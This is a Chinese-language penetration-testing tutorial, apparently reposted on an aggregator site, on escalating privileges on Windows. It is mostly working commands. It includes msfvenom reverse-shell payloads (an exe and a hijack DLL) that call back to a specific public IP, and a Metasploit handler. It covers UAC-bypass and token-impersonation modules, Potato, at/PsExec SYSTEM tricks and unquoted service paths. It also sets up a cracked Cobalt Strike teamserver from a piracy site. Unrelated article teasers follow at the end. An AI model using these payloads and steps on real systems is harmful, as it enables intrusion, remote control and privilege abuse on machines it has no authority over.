权限提升WIN篇(腾讯云,CS,MSF)

溢出漏洞

信息收集

操作系统版本ver,systeminfo
漏洞补丁信息systeminfo
操作系统位数systeminfo
杀软防护tasklist /svc
网络netstat -ano,ipconfig
当前权限whoami

筛选EXP

根据前面的信息收集中的系统版本,位数和补丁情况筛选出合适的EXP

提权

根据EXP,可以选择手工操作,基于CS的半自动操作,基于MSF的全自动操作

如果提权中遇到无法执行命令的情况,可以尝试上传cmd.exe来执行

手工

可以根据GitHub上的工具和公开的利用脚本进行渗透

MSF(搭建在云服务器)

在云服务器搭建msf的目的,因为我们进行渗透测试的目标不可能只在靶机,我们需要一个公网IP来完成,此外,云服务器需要开启相应的端口,否则不能收到反弹shell

我的服务器是腾讯云宝塔版本,还要关闭宝塔防火墙或者开启相应端口

在/opt下搭建msf命令

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

使用msf生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=43.139.79.52 lport=7777 -f exe -o test.exe

开启msf监听模块,模块的设置应与生成的木马一致

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 7777

run

通过拿到的shell上传并执行木马

 需要说的是,由于没有经过免杀处理,防火墙,杀毒软件等都会导致不能成功获得反弹shell

获得shell后,下一步就是利用msf来进行提权操作

 background  将界面切换到后台,记住session id

use post/multi/recon/local_exploit_suggester  使用msf的提权模块

show options 

set session 2

run

 

 选择可用的漏洞模块,直接利用提权

use exploit/windows/local/bypassuac_fodhelper

 show options 

set session 2

run

CS

我的云服务器默认是没有Java环境的,所以还要先搭建Java环境

java环境搭建

yum安装 openjdk11

yum install -y java-11-openjdk

安装位置默认为/usr/lib/jvm/,修改目录名

mv -v java-11-openjdk-11.0.12.0.7-0.el8_4.x86_64 jdk11

修改配置文件

vim /etc/profile


将光标移动到最后,在后面添加

export JAVA_HOME=/usr/lib/jvm/jdk11
export JRE_HOME=${JAVA_HOME}/jre
export CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$JRE_HOME/lib
export PATH=$PATH:$JAVA_HOME/bin:$JRE_HOME/bin


立即生效

source /etc/profile


检测是否安装成功

java -version
CS搭建
 

这是我下载CS4.8破解版本的网站

您正搜索 CS - 🔰雨苁ℒ🔰 (ddosi.org)

如图,CS是一个多人协同的渗透工具,分为客户端和服务端,服务端可以有多个,多个攻击者连接在一个服务器上,共享攻击资源和目标信息,且拥有各种强大的功能 

服务端搭建

上传CS到云服务器,这里用使用宝塔面板上传的方式

 cd CobaltStrike4.8_www.ddosi.org/

cd Server/

chmod +x teamserver 

./teamserver 43.139.79.52 yc    ip为云主机IP,yc为连接密码 

 如图,CS服务端搭建成功

客户端搭建

运行cobaltstrike-client.cmd,连接远程服务端,搭建成功

at提权(win2003)

win2003中可以采用计划任务的方式进行提权,以普通用户的权限开启一个计划任务,system执行这个计划任务,就获取了system的权限

at 17:00 /interactive cmd

PsExec提权(win08,12,16)

PsExec.exe -accepteula -s -i -d cmd

 ,

 MSF进程迁移注入(Win08,12,16)

通过msf拿到权限后,可以尝试migrate进程迁移,将进程迁移到拥有高权限的用户,实现提权的目的,这种方式利用系统的特性,不用上传文件,不会被杀毒软件等察觉

ps 查看进程

migrate PID 迁移到目标进程

令牌窃取 

令牌就是系统的临时密钥,相当于账户名和密码,原来决定是否允许这次请求和判断是属于哪一个用户的,他允许你不提供密码或其他凭证的前提下访问网络和系统资源

getuid    查看当前用户

use incognito   使用令牌窃取模块

list_tokens -u   列出可用的令牌

impersonate_token 目标令牌   窃取目标令牌

whoami  查看当前用户

低权限用户可以借助烂土豆配合令牌窃取实现提权

 execute -cH -f ./potato.exe

use incognito 

list_tokens -u 

impersonate_token

这里实际是利用烂2土豆这个溢出漏洞 ,使我们可以利用低权限来进行令牌窃取

msf直接提权 

msf是一款强大的渗透测试工具,可以使用getsystem直接提权

getsystem

 Bypass UAC

UAC即用户账户控制,为了上传的exe和bat程序等可绕过此安全机制,所以需要学习

UAC可以直接搜索msconfig>选择系统设置> 工具>更改UAC设置

 默认是这个选项,当我们打开一个程序的时候,就会有弹窗提示程序尝试更改计算机

MSF的bypassUAC模块(win10以后不适用)

use exploit/windows/local/bypassuac

MSF的ask模块(需要目标点击)

use exploit/windows/local/ask

MSF绕过win10模块

use exploit/windows/local/bypassuac_sluihijack  

UACMe 

UACMe是GitHub绕过UAC的项目 

hfiref0x/UACME: Defeating Windows User Account Control (github.com)

DLL劫持提权

Windows程序启动需要dll,如果dll不存在,Windows就会按照既定路线寻找,可以在他寻找的位置放恶意dll来提权

1、应用程序加载的目录
2、C:Windows/System32
3、C:Windows/System
4、Windows
5、当前工作目录Current Working Directory,CWD
6、在PATH环境变量的目录(先系统后用户)

可以借助火绒剑来分析进程,并使用其他程序验证是否可以dll劫持

假如上面的文件可以被dll劫持,就可以把原来的dll文件删掉,使用msf生成一个和他名字相同的dll后门

 msfvenom -p windows/meterpreter/reverse_tcp lhost=43.139.79.52 lport=7777 -f dll -o VCRUNTIME140.dll

 不带引号服务路径提权

在Windows系统中,带不带引号是很重要的,如下面这个程序

C:\Program Files\Dolby.exe

“C:\Program Files\Dolby”

如果不带引号,Files\Dolby被当成一个参数,我们前面说了程序文件寻找路径,那么只要我们在程序真正要寻找路径前放上我们的恶意程序,攻击目的就达成了

C:\Program.exe

当执行 C:\Program Files\Dolby.exe的时候,实际执行的其实是C:\Program.exe

检测工具:https://github.com/PowerShellMafia/PowerSploit
https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk

攻击流程:检测路径>制作文件并上传>更改路径指向>等待目标路径调用

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/138178.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

喜报 | 亮相2023数博会,摘得首届数智金融创新大赛优秀奖

河北正定,千年古城,这里不仅有一幕幕刀光剑影,鼓角争鸣的故事,还有驰名中外的人“一寺四塔”,有宜人的气候,也有汇聚高科技的天下英雄会。 图源于网络 2023年9月6日,河北正定,中国国…

JavaWeb开发-07-MySQL(二)

一.数据库操作-DQL -- 准备测试数据 INSERT INTO tb_emp (id, username, password, name, gender, image, job, entrydate, create_time, update_time) VALUES (1, jinyong, 123456, 金庸, 1, 1.jpg, 4, 2000-01-01, 2022-10-27 16:35:33, 2022-10-27 16:35:35), (2, zhangwuji…

搭建GraphQL服务

js版 GraphQL在 NodeJS 服务端中使用最多 安装graphql-yoga: npm install graphql-yoga 新建index.js: const {GraphQLServer} require("graphql-yoga")const server new GraphQLServer({ typeDefs: type Query { hello(name:String):String! …

Linux CentOS7 tree命令

tree就是树,是文件或文件名输出到控制台的一种显示形式。 tree命令作用:以树状图列出目录的内容,包括文件、子目录及子目录中的文件和目录等。 我们使用ll命令显示只能显示一个层级的普通文件和目录的名称。而使用tree则可以树的形式将指定…

打架识别相关开源数据集资源汇总(附下载链接)

更多数据集分类资源汇总:https://www.cvmart.net/dataSets 监控摄像头下的打架检测 数据集下载链接:http://suo.nz/39IbxQ 该数据集是从包含打架实例的 Youtube 视频中收集的。此外,还包括一些来自常规监控摄像机视频的非打架序列。 总共有…

Linux -- 使用多张gpu卡进行深度学习任务(以tensorflow为例)

在linux系统上进行多gpu卡的深度学习任务 确保已安装最新的 TensorFlow GPU 版本。 import tensorflow as tf print("Num GPUs Available: ", len(tf.config.list_physical_devices(GPU)))1、确保你已经正确安装了tensorflow和相关的GPU驱动,这里可以通…

Mac电脑安装Zulu Open JDK 8 使用 spring-kafka 消费不到Kafka Partition中的消息

一、现象描述 使用Mac电脑本地启动spring-kakfa消费不到Kafka的消息,监控消费组的消息偏移量发现存在Lag的消息,但是本地客户端就是拉取不到,通过部署到公司k8s容器上消息却能正常消费! 本地启动的服务消费组监控 公司k8s容器服…

9.2.3.1 【MySQL】XDES Entry链表

当段中数据较少的时候,首先会查看表空间中是否有状态为 FREE_FRAG 的区,也就是找还有空闲空间的碎片区,如果找到了,那么从该区中取一些零碎的页把数据插进去;否则到表空间下申请一个状态为 FREE 的区,也就是…

关于时空数据的培训 GAN:实用指南(第 02/3 部分)

一、说明 在本系列关于训练 GAN 实用指南的第 1 部分中,我们讨论了 a) 鉴别器 (D) 和生成器 (G) 训练之间的不平衡如何导致模式崩溃和由于梯度消失而导致静音学习,以及 b) GAN 对超参…

CTF —— 网络安全大赛(这不比王者好玩吗?)

前言 随着大数据、人工智能的发展,人们步入了新的时代,逐渐走上科技的巅峰。 \ ⚔科技是一把双刃剑,网络安全不容忽视,人们的隐私在大数据面前暴露无遗,账户被盗、资金损失、网络诈骗、隐私泄露,种种迹象…

Conditional DETR(ICCV 21)

Conditional DETR(ICCV 21) Conditional DETR for Fast Training Convergence 加速detr收敛(50 epoch收敛) DETR收敛慢的原因 DETR训练收敛速度慢,需要500 epochs DETR的Cross Attention高度依赖content embedding…

软件项目开发的流程及关键点

软件项目开发的流程及关键点 graph LR A[需求分析] --> B[系统设计] B --> C[编码开发] C --> D[测试验证] D --> E[部署上线] E --> F[运维支持]在项目开发的流程中,首先是进行需求分析,明确项目的目标和功能要求。接下来是系统设计&am…

数据结构与算法——13.队列的拓展

这篇文章主要讲一下双端队列,优先队列,阻塞队列等队列的拓展内容。 目录 1.队列拓展概述 2.双端队列的链表实现 3.双端队列的数组实现 4.优先队列无序数组实现 5.阻塞队列 6.总结 1.队列拓展概述 首先来看一张图,来大致了解一下他们的…

解决SpringMVC在JSP页面取不到ModelAndView中数据

版权声明 本文原创作者:谷哥的小弟作者博客地址:http://blog.csdn.net/lfdfhl 问题描述 ModelAndView携带数据跳转到指定JSP页面后在该页面通过EL表达式取不到原本存放在ModelAndView中的数据。 问题原因 在IDEA中创建Maven工程时web.xml中默认的约束…

QT用户登录注册,数据库实现

登录窗口头文件 #ifndef LOGINUI_H #define LOGINUI_H#include <QWidget> #include <QLineEdit> #include <QPushButton> #include <QLabel> #include <QMessageBox>#include <QSqlDatabase> //数据库管理类 #include <QSqlQuery> …

滚雪球学Java(40):解读Java面向对象编程中的方法和继承,打造可维护的代码库

&#x1f3c6;本文收录于「滚雪球学Java」专栏&#xff0c;专业攻坚指数级提升&#xff0c;助你一臂之力&#xff0c;带你早日登顶&#x1f680;&#xff0c;欢迎大家关注&&收藏&#xff01;持续更新中&#xff0c;up&#xff01;up&#xff01;up&#xff01;&#xf…

Ajax学习笔记

目录 Ajax介绍Ajax概述同步异步 原生Ajax演示AxiosAxios的基本使用Axios快速入门Axios请求方法别名Axios案例 Ajax介绍 Ajax概述 我们前端页面中的数据应该来自于后台&#xff0c;那么我们的后台和前端是互不影响的2个程序&#xff0c;那么我们前端应该如何从后台获取数据呢&…

Ansible 自动化运维工具部署主从数据库+读写分离

文章目录 Ansible 自动化运维工具部署主从数据库读写分离一、主从复制和读写分离介绍二、准备工作&#xff08;1&#xff09;节点规划&#xff08;2&#xff09;修改主机名&#xff08;3&#xff09;免密&#xff08;4&#xff09;配置IP映射&#xff08;5&#xff09;安装ansi…

【二叉树】二叉树展开为链表-力扣 114 题

&#x1f49d;&#x1f49d;&#x1f49d;欢迎来到我的博客&#xff0c;很高兴能够在这里和您见面&#xff01;希望您在这里可以感受到一份轻松愉快的氛围&#xff0c;不仅可以获得有趣的内容和知识&#xff0c;也可以畅所欲言、分享您的想法和见解。 推荐:kuan 的首页,持续学…

springcloud3 分布式事务解决方案seata之XA模式4

一 seata的模式 1.1 seata的几种模式比较 Seata基于上述架构提供了四种不同的分布式事务解决方案&#xff1a; XA模式&#xff1a;强一致性分阶段事务模式&#xff0c;牺牲了一定的可用性&#xff0c;无业务侵入 TCC模式&#xff1a;最终一致的分阶段事务模式&#xff0c;有…